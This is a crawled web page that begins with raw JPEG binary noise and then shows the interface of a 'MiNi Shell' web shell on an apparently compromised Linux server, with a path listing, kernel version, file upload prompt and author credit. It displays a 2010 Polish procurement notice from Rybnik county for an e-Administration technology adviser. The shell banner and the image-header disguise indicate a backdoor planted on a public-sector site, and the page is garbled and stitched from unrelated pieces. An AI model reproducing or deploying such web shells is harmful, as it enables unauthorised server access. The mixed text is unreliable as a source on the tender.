JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100527/147414-N-2010.html

<p class="kh_header"><b>Rybnik: Wybór doradcy technologicznego w celu realizacji zadania e- Administracja w Powiecie Rybnickim</b><br>
<b>Numer ogłoszenia: 147414 - 2010; data zamieszczenia: 27.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Rybniku , ul. 3 Maja 31, 44-200 Rybnik, woj. śląskie, tel. 032 4228300, faks 032 4228658.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.rybnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór doradcy technologicznego w celu realizacji zadania e- Administracja w Powiecie Rybnickim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór doradcy technologicznego w celu realizacji zadania: 
e-Administracja w Powiecie Rybnickim współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013, którego liderem jest Powiat Rybnicki, zaś partnerami gminy: Czerwionka-Leszczyny, Gaszowice, Lyski.

Ilekroć w SIWZ jest mowa o Zamawiającym rozumie się przez to Lidera projektu, jednakże doradca zobowiązany będzie do wykonywania swoich zadań względem Zamawiającego jak 
i partnerów projektu. 

Poniższe zadania należy wykonać  zgodnie z Koncepcją techniczną projektu 
e-Administracja w Powiecie Rybnickim, której wyciąg stanowi załącznik Nr 1 do SIWZ. 

1.	Do podstawowych obowiązków doradcy względem lidera i partnerów projektu będzie należało:
1)	zarządzanie projektem w zakresie wdrażania rozwiązań teleinformatycznych,
2)	bieżące doradztwo w zakresie przedmiotu projektu i wymogów związanych 
z wdrożeniem projektu, 
3)	kontrola procesu realizacji Projektu, w zakresie zgodności z założeniami 
i dokumentacją techniczną, harmonogramem,
4)	monitorowanie realizacji wskaźników projektu,
5)	identyfikacja obszarów problemowych i ryzykownych w implementacji projektu, aby być w stanie zaplanować środki zaradcze,
6)	doradztwo i wspieranie procesu rozliczania dotacji uzyskanej w ramach projektu 
( sprawozdawczość, wnioski o płatność, doradztwo Zamawiającemu w zakresie współpracy z Instytucją Zarządzającą RPO WSL 2007-2013, reprezentowanie Zamawiającego w tych kontaktach ),
7)	uczestniczenie w naradach roboczych, wymagających wsparcia wiedzą fachową. 

2.	Sposób wykonania niniejszego zamówienia musi zapewnić Zamawiającemu kompleksowe wsparcie w zakresie wdrażanych rozwiązań teleinformatycznych, które doprowadzi do stworzenia teleinformatycznego środowiska, zgodnie z przyjętym zakresem Projektu.

3.	Doradca zobowiązany będzie do wykonania swoich obowiązków zgodnie 
z obowiązującym prawem, w szczególności z aktami prawnymi związanymi 
z elektroniczną administracją, istotnymi dla działań zaplanowanych w ramach projektu, 
w szczególności:
a)	ustawą z dnia 06.09.2001 r. o dostępie do informacji publicznej (Dz. U. z 2001 r., Nr 112,  poz. 1198.z późn. zm.),
b)	ustawą z dnia 18.09.2001 r. o podpisie elektronicznym (Dz.U. z 2001 r., Nr 130, poz. 1450 z późn. zm.),
c)	ustawą z dnia 29.08.1997 r. o ochronie danych osobowych (j.t. Dz.U z 2002 r., Nr 101 poz. 926 z późn. zm.),
d)	ustawą z dnia 18.07.2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2002 r., 
Nr 144,  poz. 1204 z późn. zm.),
e)	ustawą z dnia 17.02.2005 r. o informatyzacji podmiotów realizujących zadania publiczne (Dz.U z 2005r.,Nr 64,  poz. 565 z późn. zm.),
f)	ustawą z dnia 22.01.1999 r. o ochronie informacji niejawnych ( j.t. Dz.U z 2005 r., Nr 196,  poz. 1631 z późn. zm. ).
g)	ustawą z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (j.t. Dz.U. z 2007, Nr 223, poz. 1655 z późn. zm. ) i aktami wykonawczymi,  

4.	Doradca zobowiązany będzie do bieżącego doradzania Zamawiającemu w zakresie organizacji projektu i sposobu jego funkcjonowania poprzez:
a)	pisemne opracowanie przez doradcę sposobu organizacji projektu - opisu kompetencji, podziału ról w projekcie, sposobu komunikacji,
b)	doradztwo w zakresie określenia procedur związanych z monitoringiem projektu 
i raportowania dla Zamawiającego, którymi związany zostanie wykonawca projektu,
c)	pisemne opracowanie ankiet na podstawie których mierzone będą wskaźniki oddziaływania,

5.	Doradca zobowiązany będzie do bieżącego doradzania Zamawiającemu przy  procedurze wyboru przyszłych wykonawców projektu oraz będzie członkiem komisji przetargowych. Zamawiający przewiduje odrębne postępowania o udzielenie zamówienia publicznego na zadania będące częścią wspólną dla Lidera projektu jak i partnerów, oraz cztery odrębne postępowania na poszczególne części, które Lider i  każdy z partnerów będzie realizował odrębnie. Podziały zadań określa załącznik nr  2 do niniejszej SIWZ.
1)	W zakresie opracowania dokumentów wymaganych Prawem zamówień publicznych niezbędnych do wyłonienia wykonawcy projektu Doradca zobowiązany będzie przygotować w wersji pisemnej i elektronicznej na nośniku DVD lub CD ( plik PDF  
i Word ) oraz dostarczyć do siedziby Zamawiającego, w terminie 30 dni, licząc od dnia podpisania umowy:
a)	dokumentację budowlaną i techniczną, wymaganą przepisami prawa,
b)	oszacowanie przedmiotu zamówienia,
c)	Specyfikację Istotnych Warunków Zamówienia,
d)	wzór umowy,
e)	ogłoszenie o zamówieniu,
W/w dokumenty należy przygotować odrębnie do każdego z zadań wydzielonych 
w załączniku nr 2 do SIWZ.
Materiały mają być przygotowane w ścisłej współpracy z Zamawiającym. Zamawiający zastrzega sobie prawo do dokonania zmian w przedstawionych materiałach (przed ostatecznym odbiorem), a Doradca zobowiązany jest uwzględnić i nanieść zmiany. Doradca zobowiązany jest przedstawić Zamawiającemu materiały do weryfikacji, najpóźniej na siedem dni przed terminem wyznaczonym w pkt 1). 
2)	W zakresie zapewnienia wsparcia i pomocy dla Zamawiającego w trakcie postępowania o udzielenie zamówienia publicznego, w zakresie wykonania projektu Doradca zobowiązany jest w szczególności do:
a)	przygotowania pisemnej odpowiedzi na wnioski wykonawców ubiegających się 
o zamówienie o wyjaśnienie treści SIWZ wraz z informacją dotyczącą konieczności dokonania zmian w treści SIWZ (w terminie 3 dni, od przekazania wniosku, nie później jednak niż na 10 dni przed ostatecznym terminem składania ofert),
b)	udzielania pisemnych odpowiedzi na pytania zadane przez komisje a dotyczące przedmiotowych postępowań w terminie do 5 dni, nie licząc dnia zapytania,
c)	pomocy Zamawiającemu, poprzez pisemne przygotowanie odpowiedzi na informacje wykonawców o ewentualnej niezgodnej z ustawą czynności zamawiającego, odpowiedzi na odwołania, skarg na wyroki Krajowej Izby Odwoławczej.

6.	Doradca zobowiązany będzie do bieżącego doradzania Zamawiającemu w zakresie wymogów związanych z wdrożeniem projektu poprzez:
a)	weryfikację wymogów formalnych i merytorycznych w stosunku do przyjętych założeń w odniesieniu do prowadzonych przez wykonawców prac,
b)	weryfikację przyjętych przez wykonawców rozwiązań technicznych, funkcjonalnych 
i parametrów urządzeń,
c)	nadzór nad prawidłową realizacją harmonogramu rzeczowo-finansowego,
d)	prowadzenie rozmów z wykonawcami w celu doprecyzowania rozwiązań technicznych 
i sposobu realizacji projektu,
e)	uczestnictwo w rozwiązywaniu kwestii spornych natury technicznej i organizacyjnej pomiędzy Zamawiającym a Wykonawcami,
f)	ocenę i weryfikację propozycji zmian w projekcie w trakcie realizacji prac przedstawionych przez Wykonawców,
g)	ocenę ewentualnych roszczeń oraz problemów Wykonawców  mogących pojawić się podczas prac instalacyjno-wdrożeniowych,
h)	doradztwo w zakresie poprawności definiowania i analizy procesów oraz przeniesienia ich w środowisko informatyczne,
i)	pisemne opracowanie materiałów reklamowych i szkoleniowych, głównie materiałów do publikacji opisującej przedmiot, cele i efekty realizowanego projektu (wraz 
z osiągniętymi wskaźnikami) i folderu informacyjnego pełniącego rolę podręcznika obsługi wdrożonego systemu e-urzędu, z uwzględnieniem odpowiedniej z punktu widzenia marketingowego i regionalnego szaty graficznej, przy zastosowaniu Wytycznych Instytucji Zarządzającej Regionalnym Programem Operacyjnym Województwa Śląskiego na lata 2007-2013 dla beneficjentów w zakresie informacji 
i promocji, 

7.	Doradca zobowiązany będzie do bieżącego doradzania Zamawiającemu w zakresie identyfikacji obszarów problemowych i ryzykownych w implementacji projektu - identyfikacja zagrożeń projektu oraz przedstawianie propozycji środków zaradczych.

8.	Doradca,  na etapie odbioru prac w zakresie kontroli jakości wykonania co do zgodności 
z założeniami, dokumentacją techniczną i harmonogramem rzeczowo-finansowym zobowiązany będzie do:
1)	pisemnego opiniowania pod względem zgodności produktów projektu z założeniami merytorycznymi i formalnymi,
2)	przeglądu i zatwierdzenia opracowanych przez wykonawców projektu instrukcji 
i dokumentacji eksploatacyjnych,
3)	organizacji uruchomienia poszczególnych etapów realizacji projektu,
4)	nadzoru nad instalacją i terminową konfiguracją wdrażanych modułów / podsystemów. 
5)	Dokonania odbiorów częściowych i końcowych produktów projektu, zgodnie 
z założeniami SIWZ. 
6)	opiniowania i  zatwierdzenia kompletnej dokumentacji powykonawczej.

9.	Obowiązki Doradcy i Zamawiającego.
1)	Obowiązki doradcy:
a)	Doradca zobowiązany jest do świadczenia usług z należytą starannością, zgodnie 
z najlepszymi praktykami stosowanymi przy doradztwie projektów informatycznych,
b)	Doradca nie jest uprawniony do zaciągania żadnych zobowiązań w imieniu Zamawiającego,
c)	Doradca zobowiązany jest do zapewnienia kompetentnego personelu, który będzie współpracował z osobami wskazanymi przez Zamawiającego w czasie realizacji projektu,
2)	Obowiązki Zamawiającego:
a)	Zamawiający udostępni Doradcy wszelkie znajdujące się w jego posiadaniu informacje i/lub dokumenty, jakie mogą być niezbędne do wykonania zamówienia,
b)	Zamawiający oddeleguje kompetentnych pracowników do współpracy 
z Wykonawcą,
c)	Zamawiający zapewni personelowi Doradcy dostęp do miejsc pozostających pod kontrolą Zamawiającego, w uzgodnionych z Doradcą godzinach.
Wartość zamówienia nie przekracza kwoty określonej w
przepisach wydanych na podstawie art. 11 ust. 8 Prawa Zamówień Publicznych, zgodnie z przepisami ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (j.t.
Dz.U. z 2007, Nr 223, poz. 1655 z późn. ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.10.00.00-6, 72.26.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi w oparciu o oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy - Prawo zamówień
publicznych z dnia 29 stycznia 2004 r. z późniejszymi zmianami, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający zastrzega, że aby spełnić warunek posiadania wiedzy i doświadczenia  należy wykazać się co najmniej jedną usługą, o wartości co najmniej 80000 zł brutto, której przedmiotem było pełnienie roli doradczej w ramach projektu informatycznego, obejmujące swym zakresem kompleksowe doradztwo na wszystkich etapach projektu, w szczególności organizacyjnym, wykonania prac i ich odbioru oraz doradztwo w zakresie Prawa zamówień publicznych obejmujące przygotowanie dokumentacji przetargowej, udzielanie wyjaśnień do treści SIWZ. Zamówienie powinno obejmować wykonanie usług doradczych dla projektu informatycznego realizowanego w urzędach organów administracji publicznej w rozumieniu przepisów Kodeksu Postępowania Administracyjnego, projekt który swym zakresem obejmował co najmniej dwie z poniższych dostaw:
a)	dostawę i nadzór nad wdrożeniem platformy e-Usług publicznych
b)	dostawę i nadzór nad wdrożeniem modułu formularzy elektronicznych,
c)	dostawę i nadzór nad wdrożeniem informatycznej platformy sprzętowo-programowej,
d)	dostawę i nadzór nad wdrożeniem Biuletynu Informacji Publicznej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi w oparciu o oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy - Prawo zamówień
publicznych z dnia 29 stycznia 2004 r. z późniejszymi zmianami, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi w oparciu o oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy - Prawo zamówień
publicznych z dnia 29 stycznia 2004 r. z późniejszymi zmianami, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi w oparciu o oświadczenie o spełnianiu warunków wynikających z art. 22 ust. 1 ustawy - Prawo zamówień
publicznych z dnia 29 stycznia 2004 r. z późniejszymi zmianami, zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.starostwo.rybnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Rybniku, ul 3 Maja 31, 44-200 Rybnik, pok 210.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2010 godzina 09:30, miejsce: Starostwo Powiatowe w Rybniku, ul 3 Maja 31, 44-200 Rybnik, pok 118.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt e-Administracja w Powiecie Rybnickim jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com